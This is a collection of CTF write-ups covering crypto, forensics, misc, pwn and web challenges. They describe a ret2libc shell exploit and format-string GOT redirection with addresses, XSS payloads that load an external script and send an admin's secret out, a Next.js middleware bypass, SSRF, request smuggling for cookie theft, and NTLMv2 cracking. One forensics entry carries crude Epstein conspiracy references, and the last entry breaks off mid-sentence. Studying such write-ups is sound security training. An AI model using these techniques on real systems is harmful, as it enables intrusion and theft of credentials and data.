๐Ÿ‡ฎ๐Ÿ‡ณPragyanCTF 2026

Writeups for most challenges

crypto

Dor4_Null5

Description

A challenge-response authentication system where users can register and login. Only the "Administrator" user reveals the flag. We don't know the Administrator's secret, but the verification function has a critical weakness.

The server implements:

  1. Registration: Store a username + 64-char password hash

  2. Login: Challenge-response protocol using HKDF-derived keys, AES-ECB path computation, and HMAC-masked verification

Solution

The vulnerability is in verify_credential:

def verify_credential(session_key, expected, provided):
    h = HMAC.new(session_key, expected, SHA256)
    mask = h.digest()[:8]
    checksum = 0
    for i in range(8):
        checksum ^= expected[i] ^ provided[i] ^ mask[i]
    return checksum == 0

Instead of comparing each byte individually, it XORs all comparison results into a single byte accumulator. The check checksum == 0 only verifies:

This is a single byte constraint โ€” for any fixed provided, there's a 1/256 chance the checksum is zero regardless of whether we know expected or mask. Since the server allows up to 0x1337 (4919) menu interactions, we can brute-force this with ~256 expected attempts.

Each login attempt uses a fresh random server_token, making navigation_key, expected, and mask effectively random from our perspective. We simply repeat login attempts with a fixed response until the weak XOR check passes by chance.

Succeeds in ~150-300 attempts on average.

Flag: p_ctf{th15_m4ps-w0n't_l3ads_2_tr34s3ure!}

DumCows

Description

You can connect to a remote service that prints a cow and asks for a name. For any input name, it returns:

  • [Name: <base64>] says: <base64>

Sending FIX_COW <voice> is a special command; with the correct voice it prints a โ€œFLAG SPEAKSโ€ ciphertext.

Solution

Key observation: deterministic keystream reset per connection (multiple backends).

If you open a fresh connection and send a 16+ byte name, the service returns a ciphertext of the same length. For two different 16-byte plaintexts P and P' used as the first name in fresh connections, C ^ P and C' ^ P' are identical (for that backend). This indicates a stream cipher / OTP-style construction:

C = P XOR K

The keystream K is deterministic from the start of the connection. The host is load-balanced: different backends have different K, so you must ensure the two connections you combine are on the same backend (just retry until the decrypted plaintext matches an expected pattern).

Recover the voice.

On the first request in a connection, the server encrypts the name and also encrypts a fixed 18-byte secret in the โ€œsaysโ€ field.

  • If you send an empty name, the secret is encrypted with the first 18 keystream bytes K[0:18].

  • In another fresh connection, if you send a known 18-byte name P, you can recover K[0:18] = C_name XOR P.

  • Decrypt the secret voice: voice = C_says XOR K[0:18].

Recover the flag.

With the correct voice, FIX_COW <voice> prints a base64 string that decodes to 30 bytes (this is the ciphertext).

Send FIX_COW <voice> as the very first command in a fresh connection so it uses K[0:30].

In another fresh connection to the same backend, send a 30-byte known name P to recover K[0:30], then:

flag = C_flag XOR K[0:30]

Retry until the result matches the known flag format p_ctf{...}.

!!Cand1esaNdCrypt0!!

Description

A cake ordering server uses RSA signatures over a custom polynomial hash g(x, a, b) = (xยณ + axยฒ + bx) mod P where P is a 128-bit prime. You can sign one "approval" message and must forge a signature on a "transaction" message to get the flag.

Solution

The key insight is that g(x, a, b) = x(xยฒ + ax + b) mod P, so g(0, a, b) = 0 for any a, b. If we craft a transaction suffix such that x โ‰ก 0 (mod P), then the hash is 0 and the RSA signature of 0 is simply 0 (since 0^d mod n = 0). No signing oracle needed.

The input x is constructed as bytes_to_long(B || suffix || \x4D) where B = "I authorize the transaction:\n" and suffix is 48 printable ASCII bytes. We need:

Since P is 128-bit (16 bytes) and the suffix is 48 bytes (384 bits), we fix 32 bytes randomly and compute the remaining 16 bytes mod P, retrying until all 16 bytes fall in printable ASCII range [32, 126]. This succeeds with probability ~(95/256)^16 โ‰ˆ 1 in 2.8M, easily brute-forced.

Flag: p_ctf{3l0w-tH3_c4Ndl35.h4VE=-tHe_CaK3!!}

R0tnoT13

Description

Given a 128-bit internal state S, we receive several diagnostic frames of the form S XOR ROTR(S, k) for rotation offsets k in {2, 4, 8, 16, 32, 64}. A ciphertext encrypted using the state is also provided. Recover S and decrypt the flag.

Solution

The key insight is that all rotation offsets are powers of 2, which means even-indexed bits and odd-indexed bits are never mixed across any frame. This reduces the problem to exactly 2 unknown bits (one for each parity class).

Using the k=2 frame, we express every bit of S in terms of s_0 (for even bits) and s_1 (for odd bits):

  • s_{2i} = s_0 XOR d_0 XOR d_2 XOR ... XOR d_{2i-2} where d_j is bit j of the k=2 frame

  • s_{2i+1} = s_1 XOR d_1 XOR d_3 XOR ... XOR d_{2i-1}

With only 4 candidate states, we brute-force (s_0, s_1), verify each candidate against all 6 frames for consistency, and XOR the valid state with the ciphertext. The combination s_0=1, s_1=0 produces the flag via simple XOR decryption.

Flag: p_ctf{l1nyrl34k}


forensics

epstein files

Description

You are provided with a PDF file related to an ongoing investigation. The document appears complete, but not everything is as it seems. Analyze the file carefully and recover the hidden flag. (Flag format: pctf{...})

Solution

The PDF contains 95 pages of Epstein's "black book" contacts. The flag is hidden through a 4-layer chain: a hidden PDF comment, XOR decoding, GPG decryption, and ROT18.

Step 1: Find the hidden PDF comment

A PDF comment (lines starting with % are ignored by renderers) is embedded inside a StructElem dictionary at object 1730 (offset 13554619):

Step 2: Find the XOR key from hidden text on page 94

Page 94 (0-indexed 93) contains two text strings rendered in font F12 with black color (0 0 0 rg), then covered by a near-black rectangle (0.1098 0.1098 0.1098 rg) drawn on top, making them invisible:

  • XOR_KEY at position (422.986, 173.452)

  • JEFFREY at position (422.986, 146.92)

This tells us: the XOR key is "JEFFREY".

Step 3: XOR the hidden hex to get the GPG passphrase

The passphrase is trynottogetdiddled (lowercase).

Step 4: Decrypt the GPG data after %%EOF

109 bytes of OpenPGP encrypted data are appended after the PDF's %%EOF marker. This is a SKESK v4 packet (AES256, SHA512 S2K, 52M iterations) followed by a SEIPD v1 packet.

Step 5: ROT18 decode (ROT13 letters + ROT5 digits)

The decrypted output cpgs{...} has cpgs = ROT13 of pctf, and the digits are ROT5-encoded:

The flag in leetspeak reads: "AINT NO WAY HE SUICIDE" - a reference to the Epstein conspiracy.

Flag: pctf{41n7_n0_w4y_h3_5u1c1d3}

H@rDl4u6H

Description

A single file smile.bin (6.4 MB) containing multiple steganographic layers, Joker-themed. The flag is hidden through a chain: corrupted WAV with embedded audio stego password, encrypted 7z archive containing a PNG, a GPG-encrypted poem in the archive's trailing bytes, and finally a frequency-domain encoding scheme in the PNG image that must be XOR-decrypted with a key hidden in the image itself.

Solution

Layer 1: Carve WAV + 7z from smile.bin

The file starts with FAKE instead of RIFF. The RIFF size field gives the WAV length (882164 bytes). A 7z archive follows at that offset.

Layer 2: Audio LSB steganography

The WAV's ICMT metadata contains base64 encoding of https://github.com/sniperline047/Audio-Steganography-CLI. Using that tool's basic LSB decoder on the WAV extracts the password: transform.

Layer 3: Extract encrypted 7z

The 7z archive is password-protected. Using transform extracts a single file y0uc4n7533m3 โ€” a 3000x4500 8-bit grayscale PNG.

Layer 4: GPG-encrypted poem in 7z tail

482 bytes trail after the 7z archive's end. The first 8 bytes are rosetta\n, followed by a PGP symmetrically-encrypted message. Decrypting with password rosetta reveals a poem describing the encoding scheme:

  • 21 concentric rings in the FFT domain, each encoding 8 bits

  • Start at east (0 degrees), walk counter-clockwise in 22.5 degree steps (8 positions)

  • Dark (absence of FFT peak) = 1, Bright (FFT peak present) = 0

  • Second half of each ring mirrors the first half

Layer 5: FFT frequency-domain decoding

The 2D FFT of the PNG shows a starburst pattern with peaks at 21 radii (~100, 169, 238, ..., 1480; spacing ~69 px) and 8 angles (0, 22.5, 45, 67.5, 90, 112.5, 135, 157.5 degrees). Peaks split cleanly into present (log-mag ~13.8) and absent (log-mag ~11.1).

Layer 6: XOR decrypt with key from image

The PNG contains a key written vertically on the left margin, visible after contrast/histogram equalization: prgynxoxo. XOR the 21-byte ciphertext with this repeating key:

Flag: p_ctf{why_50_53r10u5}

Leetspeak for "why so serious" โ€” the Joker's iconic line.

$whoami

Description

An internal investigation flagged an anomalous access event involving a restricted internal resource. A packet capture was taken during the suspected time window. The task is to identify the account responsible and the credentials used.

Flag format: p_ctf{username:password}

Solution

Step 1: Protocol analysis

The pcap contains SSH, HTTP, and SMB2 traffic between 10.1.54.28 (client) and 10.1.54.102 (server).

Step 2: Identify the suspicious account

Examining SMB2 sessions reveals multiple user authentications: b.banner, groot, p.parker, hawkeye, and t.stark. Most users only connected to \\10.1.54.102\IPC$, but t.stark was the only account that successfully accessed the restricted share \\10.1.54.102\SecretPlans.

Step 3: Extract password policy and project list from HTTP traffic

The HTTP traffic contained several files served from the internal web server. Two were critical:

  • /policy.txt: SECURITY POLICY: Passwords must be [ProjectName][TimestampOfCreation_Epoch].

  • /notion.so: Listed ongoing projects: SuperHeroCallcentre, Terrabound, OceanMining, Arcadia

Step 4: Extract NTLMv2 authentication data

From t.stark's SMB2 Session Setup (NTLMSSP_AUTH):

  • Username: t.stark

  • Domain: (empty)

  • Server challenge: e3ec06e38823c231

  • NTProofStr: 977bf57592dc13451d54be92d94a095d

  • NTLMv2 blob: (extracted from response)

Step 5: Crack the NTLMv2 hash

Given the password policy [ProjectName][EpochTimestamp], the password is one of the 4 project names concatenated with a Unix epoch timestamp. A Python script implementing NTLMv2 verification was used to brute-force the combination:

The cracking revealed: password = Arcadia1451606400 (project "Arcadia" + epoch for Jan 1, 2016 00:00:00 UTC).

Flag: p_ctf{t.stark:Arcadia1451606400}

Plumbing

Description

We found a Docker image that was already built and shipped. Something sensitive might have slipped through during build time, but the final container looks clean?? Analyze the image and recover what was lost.

Flag format: p_ctf{...}

Attachment: app.tar (OCI Docker image)

Solution

The challenge provides a Docker image exported as app.tar. The key insight is that Docker images store the full build history, including all commands from the Dockerfile, in the image config JSON. Even if files are deleted in later layers, the build commands remain visible.

Step 1: Extract and inspect the image config

Step 2: Read the build history

The image config contains the full Dockerfile history. The critical entries are:

The flag p_ctf{d0ck3r_l34k5_p1p3l1n35} is leaked directly in the RUN command visible in the image history. Despite the cleanup steps (deleting intermediate files, overwriting output, replacing the script), the Dockerfile build commands are permanently recorded in the image config.

Additional forensic artifacts available in intermediate layers:

By inspecting earlier layers, one can also recover:

  • process.py: A toy block cipher using XOR and permutation with 10 rounds

  • .env: Contains AES_KEY=THIS_IS_AES_KEY!

  • state_round7.bin: Debug dump of encryption state at round 7

  • output.bin: Encrypted second block of the input

But none of these are needed since the flag is directly visible in the build history.

Flag: p_ctf{d0ck3r_l34k5_p1p3l1n35}

c47chm31fy0uc4n

Description

We are given a Linux memory dump (attachments/memdump.fin) from shortly after an incident. We must recover, from memory only:

  • The session key exfiltrated by a malicious userspace process

  • The epoch timestamp used during exfiltration

  • The destination IP used for exfiltration

  • The attacker's ephemeral source port during remote (SSH) access

Flag format:

p_ctf{<session_key>:<epoch>:<exfiltration_ip>:<ephemeral_remote_execution_port>}

Solution

This solve can be done with simple string carving; no kernel symbols needed.

  1. Extract the exfiltration record (session key, epoch, destination IP)

This reveals the exfiltration line:

SYNC FLAG{heap_and_rwx_never_lie} 1769853900 10.13.37.7

So:

  • session_key = heap_and_rwx_never_lie (the value inside FLAG{...})

  • epoch = 1769853900

  • exfiltration_ip = 10.13.37.7

You can confirm the process kept the key in its environment:

  1. Identify the attacker's SSH ephemeral source port

First, list the SSH login artifacts present in memory:

Multiple SSH source ports appear, so we correlate the malicious execution context (msg_sync) to the SSH session environment block.

In that context, the SSH environment variables show:

  • SSH_CLIENT=192.168.153.1 57540 22

  • SSH_CONNECTION=192.168.153.1 57540 192.168.153.130 22

  • SSH_TTY=/dev/pts/0

Therefore the attacker sessionโ€™s ephemeral source port is 57540.

  1. Assemble the final flag


misc

Lost in the Haze

Description

A geolocation/OSINT challenge providing a Google Street View image (whereami.png) of a Japanese urban street. The challenge title is "Lost in the Haze" with the description: "I remember stepping outside for a moment. The air felt heavy, the lights too bright, the streets unfamiliar. All I know is that this location has a name."

Flag format: p_ctf{ward_name}

Solution

The key clue is in the challenge title: "Lost in the Haze."

The word "haze" translates to kasumi (้œž) in Japanese. The most famous location in Japan with "kasumi" in its name is Kasumigaseki (้œžใƒถ้–ข), literally meaning "Gate of Mist/Haze." Kasumigaseki is located in Chiyoda ward (ๅƒไปฃ็”ฐๅŒบ), Tokyo, and is well known as Japan's government district.

The image confirms a Japanese urban setting via Google Street View, showing narrow streets with a distinctive granite stone wall, vending machines, and dense residential/commercial buildings typical of central Tokyo.

Combining the linguistic hint with the visual confirmation:

  • "Haze" โ†’ kasumi (้œž) โ†’ Kasumigaseki (้œžใƒถ้–ข) โ†’ Chiyoda ward

Flag: p_ctf{chiyoda}

Tac Tic Toe

Description

A web-based tic-tac-toe game at https://tac-tic-toe.ctf.prgy.in where you play against an AI. The game logic runs in a Go-compiled WebAssembly module (main.wasm). The AI uses minimax, making it unbeatable through normal play. Winning the game triggers a /win endpoint that returns the flag, but it requires a valid cryptographic proof generated by the WASM.

Solution

The game flow:

  1. GET /start returns a session_id and proof_seed

  2. The WASM initializes with the seed, and each move (player + AI) updates a rolling proof via UpdateProof() using custom mixing functions (proofMixA/B/C/D)

  3. On win, GetWinData() returns the move sequence and proof, which is submitted to POST /win for server-side verification

The server validates the proof against the seed and moves but does not enforce that the AI played optimally -- it only replays the moves and checks the proof matches. This means if we patch the WASM to make the AI play poorly, the proof will still be valid because UpdateProof depends only on move positions and the seed, not on how the AI chose its move.

Steps:

  1. Download main.wasm and convert to WAT text format using wasm2wat

  2. Locate the main.playPerfectMove function which selects the AI's best move via minimax

  3. Patch two values:

    • Change initial bestScore from -1000 to 1000 (so the AI starts looking for the minimum score)

    • Change the comparison i64.lt_s to i64.gt_s (so the AI picks the worst move instead of the best)

  4. Convert back to WASM with wat2wasm

  5. Run the patched WASM in Node.js with the server's proof_seed, play winning moves, and submit the resulting proof

The patched AI places its marks in the worst positions. Playing moves [0, 3, 6] (left column) wins in 3 turns:

  • Player -> 0, AI -> 1

  • Player -> 3, AI -> 2

  • Player -> 6 (win: left column)

The WASM patching was done with:

Flag: p_ctf{W@sM@_!s_Fas&t_Bu?_$ecur!ty}


pwn

pCalc

Description

A "super secure calculator" Python jail. The server evaluates user input through eval() with restricted builtins ({"__builtins__": {}}) and an AST validator that only allows math-related nodes (BinOp, UnaryOp, Constant, Name, operator, unaryop) plus JoinedStr (f-strings). An audit hook blocks os.system, os.popen, subprocess.Popen, and opening files with "flag" in the name. The string "import" is also blocked in the raw input.

Solution

Three vulnerabilities chained together:

  1. F-string AST bypass: The AST validator allows JoinedStr (f-string) nodes but does pass instead of recursing into children. This means arbitrary Python expressions inside f"{...}" are never validated.

  2. Object hierarchy for builtins: Since __builtins__ is empty in the eval context, we walk Python's object hierarchy ().__class__.__mro__[1].__subclasses__() to find a class with a Python __init__ function, then access __init__.__globals__['__builtins__'] to recover the full builtins dict.

  3. Bytes path audit bypass: The audit hook checks isinstance(args[0], str) and 'flag' in args[0]. Passing the filename as bytes (b'flag.txt') makes isinstance(args[0], str) return False, bypassing the check entirely.

The "import" filter is bypassed with string concatenation ('__imp'+'ort__'), though it's not even needed for the file read payload.

Flag: p_ctf{CHA7C4LCisJUst$HorTf0rcaLCUla70r}

Dirty Laundry

Description

The washing machine doesn't seem to work. Could you take a look?

Binary with libc 2.35 provided. Connect via ncat --ssl dirty-laundry.ctf.prgy.in 1337.

Solution

Classic ret2libc buffer overflow. The vuln() function allocates a 0x40 (64) byte buffer but reads 0x100 (256) bytes via read(), giving a clean stack overflow with no canary and no PIE.

Binary protections: Partial RELRO, No canary, NX enabled, No PIE.

Strategy: Two-stage ROP chain:

  1. Stage 1 โ€” Leak libc: Overflow to call puts(GOT.puts) which prints the resolved libc address of puts, then return to vuln for a second input. A ret gadget is inserted before the return to vuln to fix 16-byte stack alignment (since ret-to-function differs from call).

  2. Stage 2 โ€” Shell: Calculate libc base from the leak, overflow again to call system("/bin/sh").

Key gadgets from the binary (no PIE, so addresses are fixed):

  • pop rdi; pop r14; ret at 0x4011a7

  • ret at 0x40101a

Flag: p_ctf{14UnDryHASbEenSUCces$fU11YCOMP1e73d}

Talking Mirror

Description

A 64-bit ELF reads a line with fgets(buf, 0x64, stdin) and then calls printf(buf) followed by exit(0). The goal is to print flag.txt via the provided win() function.

Solution

The bug is a classic format-string vulnerability (printf(buf)) with NX enabled. The obvious exploit is to overwrite exit@GOT with win, but every .got.plt address is 0x400a** and therefore contains a 0x0a byte; fgets() stops at newline, so you cannot place any .got.plt pointer directly in the input.

Key observation: the first PT_LOAD segment is RW and contains .dynsym and .rela.plt at fixed addresses (no PIE), and those addresses do not contain 0x0a. We can avoid writing to .got.plt entirely by redirecting lazy binding:

  • exit@plt triggers the dynamic linker (_dl_fixup) using the exit relocation entry in .rela.plt.

  • That relocationโ€™s r_info encodes the symbol index. For exit, the symbol index is 10.

  • If we change the symbol index to 11 (stdout) in that relocation, the exit@plt call will resolve the symbol stdout instead of exit.

  • stdout (dynsym index 11) is one of the few symbols actually present in the executableโ€™s .gnu.hash (symoffset=11), so _dl_lookup_symbol_x will find the executableโ€™s stdout definition.

  • Patch dynsym[11].st_value to the address of win (0x401216). Now โ€œresolving stdoutโ€ returns win.

  • When vuln() calls exit(0), the resolver jumps to win(), which prints the flag and _exit(0)s.

Concrete writes (all to the RW first segment):

  • .rela.plt exit entry is at 0x400638 + 7*24 = 0x4006e0.

    • r_info is at 0x4006e8.

    • The symbol index (high 32 bits) is stored at 0x4006ec; write 0x0b to make it symbol 11.

  • .dynsym base is 0x4003d8, entry size 24.

    • dynsym[11] starts at 0x4003d8 + 11*24 = 0x4004e0.

    • st_value is at 0x4004e8; write 0x401216 (done as two %hn writes: 0x0040 at 0x4004ea and 0x1216 at 0x4004e8).

Exploit code (single shot):

TerViMator

Description

Skynet is rising. Can you defeat this early version of the T-1000s mainframe before it becomes unstoppable?

ncat --ssl tervimator.ctf.prgy.in 1337

A stripped PIE binary (Full RELRO, NX, no canary) implementing a custom bytecode VM. Binary protections:

  • PIE enabled (randomized base)

  • Full RELRO (GOT not writable)

  • NX enabled (no shellcode)

  • No stack canary

Solution

Reverse Engineering the VM:

The binary reads up to 0x1000 bytes of bytecode, then executes a custom VM with 16 32-bit registers, 7 opcodes, and 9 syscalls.

Opcodes (0-6):

Opcode
Name
Format
Description

0

HALT

00

Stop execution

1

LOADI

01 reg imm32

regs[reg] = imm32

2

MOV

02 dst src

regs[dst] = regs[src]

3

ADD

03 dst src

regs[dst] += regs[src]

4

SUB

04 dst src

regs[dst] -= regs[src]

5

XOR

05 dst src

regs[dst] ^= regs[src]

6

SYSCALL

06

Dispatch on regs[0]

Syscalls (regs[0] = 1-9):

ID
Name
Args
Description

1

alloc_data

size=r1

Allocate data object (perm=rw, type=1)

2

alloc_exec

task=r1

Allocate exec object (perm=x, type=2), stores func_ptr ^ KEY

3

gc

-

Free objects with refcount=0

4

split

obj=r1

refcount += 2

5

name

obj=r1, len=r2

Read len bytes from stdin into &objects[obj] (max 0x40)

6

write_byte

obj=r1, off=r2, val=r3

Write byte at &obj + 0x10 + off (requires perm & 2)

7

inspect

obj=r1, off=r2

Print byte at &obj + 0x10 + off (requires perm & 1)

8

execute

obj=r1

Decode ptr ^ KEY and call it (requires perm & 4, type=2)

9

dup

obj=r1

refcount += 1

Object struct (24 bytes each, 16 max, at BSS offset 0x5040):

Win function at offset 0x129d: calls puts("CRITICAL: PRIVILEGE ESCALATION.") then system("/bin/sh").

Vulnerabilities:

  1. No bounds check on inspect/write_byte offset - The inspect and write_byte syscalls access &objects[obj] + 0x10 + offset with no bounds validation on offset, allowing read/write into adjacent object structs.

  2. Name syscall overwrites object struct - The name syscall writes raw bytes starting at &objects[obj] (the struct base), not the heap buffer. With len up to 0x40 (64 bytes), this overflows into subsequent objects' structs (each 24 bytes).

Exploit Strategy:

  1. Allocate data object 0 (type=1, perm=rw) and exec object 1 (type=2, perm=x)

  2. Use inspect(obj=0, offset=24..31) to read object 1's XOR-encoded function pointer through the out-of-bounds read (no bounds check on offset)

  3. Decode the leak: alloc_data_addr = stored ^ KEY, compute win_addr = alloc_data_addr - 0x141

  4. Use name(obj=0, len=48) to overwrite both objects' structs from stdin, setting object 1's pointer to win_addr ^ KEY

  5. execute(obj=1) decodes the pointer and calls the win function

Flag: p_ctf{tErVIm4TOrT-1000ha$BE3nd3feaT3D}


web

Server OC

Description

Overclocking increases FPS, but for a SysAd, does it increase...Requests Per Second?

The flag is in two parts. Express.js web app simulating a server overclocking interface with a CPU multiplier control, benchmark functionality, and a logs endpoint.

URL: https://server-oc.ctf.prgy.in/

Solution

The challenge has two independent flag parts obtained through different vulnerabilities.

Reconnaissance:

  • GET /robots.txt reveals hardware info (CPU: i9-9900K, Motherboard: Asus Z390)

  • GET /script.js reveals the client-side flow: overclock โ†’ benchmark โ†’ leConfig โ†’ logs

  • POST /api/overclock with {"multiplier": 76} is the magic value that enables the benchmark button (showBe: true)

  • POST /leConfig issues a JWT cookie whose payload hints at the /logs endpoint and example payload {"Path": "C:\\Windows\\Log\\systemRestore"}

  • GET /api/benchmark/url returns the SSRF target URL

Flag Part 2 โ€” SSRF endpoint direct access:

The /benchmark endpoint is an SSRF handler that fetches url query param server-side. However, it also checks for an internal query param directly. By passing internal=flag as a query parameter to the outer server (not inside the SSRF URL), the handler returns the second flag part directly:

Flag Part 1 โ€” Prototype pollution on /logs:

The /logs endpoint requires:

  1. A valid session (from POST /api/reset)

  2. Overclock set to multiplier 76 (via POST /api/overclock)

  3. A JWT token cookie (from POST /leConfig)

  4. A JSON body with a Windows path

However, it returns "Invalid user permissions" even with all correct parameters. The bypass is JSON prototype pollution โ€” injecting "__proto__": {"isAdmin": true} into the request body:

Complete flag: p_ctf{L!qU1d_H3L1um_$h0ulD_N0T_T0uch_$3rv3rs}

("Liquid Helium Should Not Touch Servers" โ€” a reference to extreme overclocking with liquid helium cooling)

Shadow Fight

Description

XSS challenge where the flag is hidden inside a closed Shadow DOM. A profile card generator takes name and avatar URL parameters, validates them with an isSafe() blocklist, and renders the name via innerHTML. An admin bot (HeadlessChrome/144) visits submitted profiles via a /review endpoint. The flag is in a closed shadow root on the admin's page:

Solution

Three key obstacles:

  1. XSS with blocklist bypass: isSafe() blocks ", document, window, fetch, location, Function, constructor, prototype, from, char, escape, import, atob, btoa, and more. Name is limited to 50 chars.

  2. Variable scoping in inline handlers: Inline event handlers (onload) have a with(document) scope chain, so avatar resolves to the <input id="avatar"> DOM element instead of the const avatar JS variable.

  3. Closed Shadow DOM extraction: element.shadowRoot returns null for closed shadows, and getInnerHTML() was removed in Chrome 127+.

Bypass strategy:

  • Name field (47 chars): Use <svg/onload=...> with (0,eval)() (indirect eval) to escape the with(document) scope and access the const avatar variable from the global declarative environment:

  • Avatar field: Smuggle the full JS payload in the URL path after https://picsum.photos/1/ (24-char prefix). The domain passes the allowlist check, and avatar.slice(24) extracts the payload at runtime.

  • Shadow DOM extraction: Override Element.prototype.attachShadow with a Proxy to capture shadow root references, then re-execute the shadow DOM creation script via (0,eval)(scriptTag.textContent). Use 'proto'+'type' and 'doc'+'ument' string concatenation to bypass the blocklist.

Full exploit:

How the Proxy trick works:

  1. Element.prototype.attachShadow is wrapped in a Proxy that intercepts apply calls

  2. The proxy captures the returned shadow root reference in _r (works for both open and closed shadows)

  3. The original shadow DOM creation script is found via querySelectorAll('script') and re-executed with (0,eval)()

  4. When the re-executed script calls attachShadow(), the proxy captures the new shadow root

  5. After shadow.innerHTML = '<p>FLAG</p>' runs, _r.innerHTML contains the flag

  6. The flag is exfiltrated via new Image().src to a webhook

Flag: p_ctf{uRi_iz_js_db76a80a938a9ce3}

Note Keeper

Description

A simple note-keeping application built with Next.js 15.1.1. The challenge asks "Can you reach what you're not supposed to?" The app has a guest-facing notes page, a login page, and a middleware-protected admin panel at /admin.

Solution

This challenge involves chaining two vulnerabilities: CVE-2025-29927 (Next.js middleware authorization bypass) and SSRF via Location header injection through NextResponse.next({headers: request.headers}).

Step 1: Reconnaissance

The app is a Next.js 15.1.1 application. The login link contains a base64-encoded state parameter L2FkbWlu = /admin. The /admin route returns 401 with <!--Request Forbidden by Next.js 15.1.1 Middleware-->.

Step 2: Middleware Bypass (CVE-2025-29927)

Next.js 15.1.1 is vulnerable to CVE-2025-29927, which allows bypassing middleware by setting the x-middleware-subrequest header. For Next.js 15.x, the middleware name must be repeated 5 times (recursion depth limit):

This reveals the admin panel with 7 notes containing hints:

  • A pastebin link (https://pastebin.com/GNQ36Hn4) with the middleware source code

  • A base64 string WyIvc3RhdHMiLCAiL25vdGVzIiwgIi9mbGFnIiwgIi8iXQ== decoding to ["/stats", "/notes", "/flag", "/"] โ€” backend API routes

Step 3: Analyzing the Middleware Source

The pastebin reveals the middleware code:

The critical vulnerability: for /api routes, the middleware calls NextResponse.next({headers: request.headers}), passing all incoming request headers into the middleware response.

Step 4: SSRF via Location Header Injection

The admin page's client-side JavaScript reveals the backend runs at http://backend:4000 with a /flag endpoint. This internal service is not directly accessible.

When NextResponse.next() receives headers including a Location header, Next.js interprets it as a server-side redirect and fetches the specified URL internally. By injecting a Location header pointing to the internal backend, we achieve SSRF:

This causes the Next.js server to fetch http://backend:4000/flag and return the response:

Flag: p_ctf{Ju$t_u$e_VITE_e111d821}

Domain Registrar

Description

A domain registrar website with KYC upload functionality. The site runs nginx + PHP/8.2.30 and has endpoints for listing domains (avlbl.php), uploading KYC documents (kyc.php), a flag endpoint (flag.php), and a checkout page with an XSS sink (checkout.html). The /public/ directory exists but returns 403 Forbidden.

Solution

The vulnerability is a path traversal via URL-encoded slash in the /public/ directory route.

Nginx routes requests to /public/ through a PHP handler for image extensions (.png, .jpg, .gif). However, using %2f (URL-encoded /) allows escaping the /public/ directory and traversing back to the webroot:

The key insight is that nginx's location /public/ directive doesn't match /public%2f since the encoded slash isn't decoded at the routing stage, but the backend/filesystem does decode it when resolving the path. This mismatch allows directory traversal out of the /public/ prefix.

The flag was stored in a file named nginx.conf in the webroot:

Flag: p_ctf{c@n_nEVer_%ru$T_D0M@!nS_FR0m_p0Ps}

Shadow Fight 2

Description

XSS challenge with a closed Shadow DOM. A "Profile Card Generator" takes name and avatar query parameters. The name is rendered via innerHTML, and there's an admin bot that reviews submitted profiles. The flag is stored in a closed Shadow DOM that's only populated with the real flag when the admin views the page. A server-side filter (isSafe()) blocks dangerous keywords like document, window, fetch, location, Function, constructor, import, from, char, code, escape, %, ", etc. Name is limited to 50 characters.

Solution

Key observations:

  1. The name parameter is reflected directly into a JavaScript string: const name = "VALUE";

  2. While " is blocked (can't break the JS string), </script> is NOT blocked โ€” the HTML parser closes the <script> tag when it encounters </script>, regardless of JS string context

  3. The isSafe() filter runs server-side but doesn't block HTML tags like <script>

  4. No Content-Security-Policy header exists, so external scripts can be loaded

  5. The flag is in the page HTML source (inside a <script> tag that creates the Shadow DOM), readable via document.scripts[].textContent

Attack flow:

  1. Set up an exfiltration server exposed via localhost.run SSH tunnel

  2. Host a JS payload that reads the flag from the DOM and exfiltrates it

  3. Inject </script><script src=//TUNNEL> as the name parameter โ€” this closes the existing script tag and loads our external script

  4. Submit the profile for admin review โ€” the admin bot visits the page, our script executes, reads the flag from the script tag, and sends it to our server

Name parameter (49 chars, under 50 limit):

Exfiltration server (server.py):

XSS payload (payload.js):

Exploit submission:

Why it works: The </script> injection breaks the existing script context at the HTML parser level โ€” the filter checks for JS-dangerous keywords but doesn't block HTML structural elements. The external script loads without restrictions (no CSP), reads the flag from the DOM (it's in the script tag's text content, not locked inside the Shadow DOM), and exfiltrates via Image() request.

Flag: p_ctf{admz_nekki_kekw_c6e194c17f2405c5}

Picture This

Description

A social media platform where users can sign up and create profiles. Only "verified" users get the flag. Profiles are reviewed by automated bots before verification. The goal is to get verified and claim the gift.

Category: web | Points: 425 | Solves: 26

Solution

The application has a three-part vulnerability chain: a MIME type mismatch in the CDN, DOM clobbering to bypass verification logic, and an admin bot that visits user-controlled content.

1. MIME Type Mismatch (.jpg vs .jpeg)

In cdn.js, the content-type defaults to text/html and only overrides for specific extensions:

But in helpers.js, the validateImage function stores JPEG files with .jpg extension:

This means uploaded JPEG files get a .jpg extension, but the CDN serves them as text/html since .jpg !== ".jpeg".

2. DOM Clobbering the Verification Check

The admin bot visits /_image/{avatar}?uid={uid}, then injects admin-helper.js which contains:

Note the typo: the default sets adminCanVerify but the check reads canAdminVerify โ€” always undefined (falsy) normally, forcing rejection. But since our JPEG is served as HTML, we embed a DOM clobbering payload:

This creates window.config (the form element, truthy) and window.config.canAdminVerify (the input element, truthy), bypassing the rejection. CSP is default-src 'self' which blocks inline scripts, but DOM clobbering requires no JavaScript execution.

3. Exploit Flow

  1. Create a minimal valid JPEG (passes file-type magic byte check) with HTML appended after the EOI marker

  2. Upload as avatar โ€” stored as uuid.jpg

  3. Request verification โ€” bot visits /_image/uuid.jpg which is served as text/html

  4. Browser parses embedded HTML, DOM clobbering sets window.config.canAdminVerify to truthy

  5. admin-helper.js submits action=verify instead of action=reject

  6. User gets verified, flag appears on profile page

Exploit Script (solve.py):

Flag: p_ctf{i_M!ss#d_Th#_JPG_5f899f05}

Crossing Boundaries

Description

The target is a blog app behind a โ€œfront proxyโ€ and a custom caching TCP proxy. The cache proxy caches GET /blogs/<id> responses. The admin bot can be triggered to review a user blog and it makes a privileged request carrying an admin session cookie; the goal is to obtain /flag.

Solution

The cache proxy has a request-desync bug on cache hits:

  • It checks the cache and, on a HIT, immediately returns the cached response and continues the loop.

  • It does this before reading the request body (Content-Length bytes).

So if we send a cache-hit request:

  1. GET /blogs/<cached> with a Content-Length and a body

  2. The proxy returns the cached blog without consuming the body

  3. The leftover body bytes are parsed as the next HTTP request on the same upstream TCP connection

To steal the admin cookie without relying on โ€œresponse stealingโ€, we smuggle an incomplete inner request:

  • Outer (carrier) request: GET /blogs/<cached> (cache HIT) with Content-Length: len(inner_bytes)

  • Inner request (parsed by cache proxy as request #2): POST /my-blogs/create with a large Content-Length for its body, but we only send the prefix content=<marker> and stop.

  • The cache proxy blocks waiting for the missing body bytes.

After we โ€œrequest reviewโ€ on one of our blogs, the admin bot waits 10s then performs:

